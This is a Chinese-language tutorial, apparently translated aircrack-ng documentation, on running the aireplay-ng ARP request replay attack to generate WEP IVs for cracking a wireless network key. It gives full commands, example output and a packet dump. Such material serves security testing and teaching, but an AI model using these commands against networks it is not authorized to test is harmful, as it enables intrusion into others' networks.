ARP请求重播攻击

描述

作为产生IVs的最有方法之一，ARP请求重播攻击一直非常稳定可靠。程序先监听一个ARP数据包，再回传给接入点，如此就会使接入点又产生一个新的包含IV的包。然后就以这种方式不断地进行下去，接入点就会一直产生新的IV。前面的文章中也提到过，正是这些IVs帮助我们破解一个网络。

什么是ARP

ARP是地址解析协议（Address Resolution Protocol），用来将IP地址转变为物理地址，如以太网地址。一个主机如果想要获得一个物理地址，就必须要在TCP/IP网络中广播一个ARP请求。被请求的主机在接收到这个请求后就会应答出自己的物理地址。ARP是aircrack-ng许多攻击的基础。

用法

基本用法：

aireplay-ng -3 -b 00:13:10:30:24:9C -h 00:11:22:33:44:55 ath0

其中：

-3表示标准ARP请求重播

-b 00:13:10:30:24:9C是接入点的MAC地址

-h 00:11:22:33:44:55是源MAC地址

ath0是无线接口名称

有两种方式用来重播ARP，第一种也是最简单的一种，就是使用相同的命令但加上”-r”，目的是从上一次成功的ARP重播中读取输出文件。

aireplay-ng -3 -b 00:13:10:30:24:9C -h 00:11:22:33:44:55 -r replay_arp-0219-115508.cap ath0

其中：

-3表示标准ARP请求重播

-b 00:13:10:30:24:9C是接入点的MAC地址

-h 00:11:22:33:44:55是源MAC地址

-r replay_arp-0219-115508.cap是上一次成功的ARP重播的文件

ath0是无线接口名称

第二种方法是交互式包重播攻击的一个特例，在这里作为ARP请求重播攻击的补充

aireplay-ng -2 -r replay_arp-0219-115508.cap ath0

其中：

-2表示交互帧选项

-r replay_arp-0219-115508.cap是上一次ARP重播成功的文件名

ath0是无线网卡接口名

用法实例

在尝试下面的实例前，还是首先要保证用airmon-ng将自己的网卡置于监听模式。然后我们需要一个关联用户的MAC地址或者从攻击【1】中得到的假MAC地址。相比之下，前者要简单一些，我们可以通过airodump-ng获得。需要使用关联用户的MAC的原因前面也提到过，因为只有这样，接入点才会接受和重复地发送包。可能需要等待一段时间，直到一个ARP请求出现。然后输入下面的命令：

aireplay-ng -3 -b 00:14:6c:7e:40:80 -h 00:0F:B5:88:AC:82 ath0

屏幕会显示：

Saving ARP requests in replay_arp-0219-123051.cap
You should also start airodump-ng to capture replies.
Read 11978 packets (got 7193 ARP requests), sent 3902 packets...

开始的时候，最后一行会像这个样子：

Read 39 packets (got 0 ARP requests), sent 0 packets...

然后，当攻击开始以后，上面0的地方会开始显示实际数量。我们也可以用airodump-ng来抓取产生的IVs。屏幕会显示数量在迅速地增加。

第二个例子我们来重用上面捕捉的ARP，已经说过，ARP会被保存在文件名为”replay_arp-0219-123051.cap”的文件里。所以，有了这些ARP以后我们就不用再去等待新的ARP了，在命令后加上”-r”参数就可利用它们来产生了。

aireplay-ng -2 -r replay_arp-0219-123051.cap ath0

屏幕会显示

Size: 86, FromDS: 0, ToDS: 1 (WEP)

BSSID  =  00:14:6C:7E:40:80
Dest. MAC  =  FF:FF:FF:FF:FF:FF
Source MAC  =  00:0F:B5:88:AC:82

0x0000:  0841 0000 0014 6c7e 4080 000f b588 ac82  .A....l~@.......
0x0010:  ffff ffff ffff 7092 e627 0000 7238 937c  ......p..'..r8.|
0x0020:  8011 36c6 2b2c a79b 08f8 0c7e f436 14f7  ..6.+,.....~.6..
0x0030:  8078 a08e 207c 17c6 43e3 fe8f 1a46 4981  .x.. |..C....FI.
0x0040:  947c 1930 742a c85f 2699 dabe 1368 df39  .|.0t*._&....h.9
0x0050:  ca97 0d9e 4731                           ....G1

Use this packet ? y

输入”y”,就会开始注入

Saving chosen packet in replay_src-0219-123117.cap
You should also start airodump-ng to capture replies.

Sent 3181 packets...

同样，依然可以使用如下命令：

aireplay-ng -3 -b 00:13:10:30:24:9C -h 00:11:22:33:44:55 -r replay_arp-0219-115508.cap ath0

或者，也可以用airodump-ng来捕捉IVs。

用法提示

本地测试在产生一个ARP去初始化ARP注入的时候，可以ping一个网络上不存在的IP地址。

常见问题

参见这里

提示信息’Read XXXXX packets (got 0 ARP requests), sent 0 packets…(0 pps)’ - 为什么没有发送任何包？

因为并没有ARP被广播到网络中，所以没有重播。如果aireplay-ng到不到包，它当然就不能重播。

交替攻击

尽管这不是一个直接解决问题的方法，但是如果不能进行攻击或者没有接入点发出的ARP请求包，可以考虑使用交替攻击。

-p 0841 method：这个方法会反复注入来自接入点的数据包产生IVs

其他

参见aireplay-ng用法指导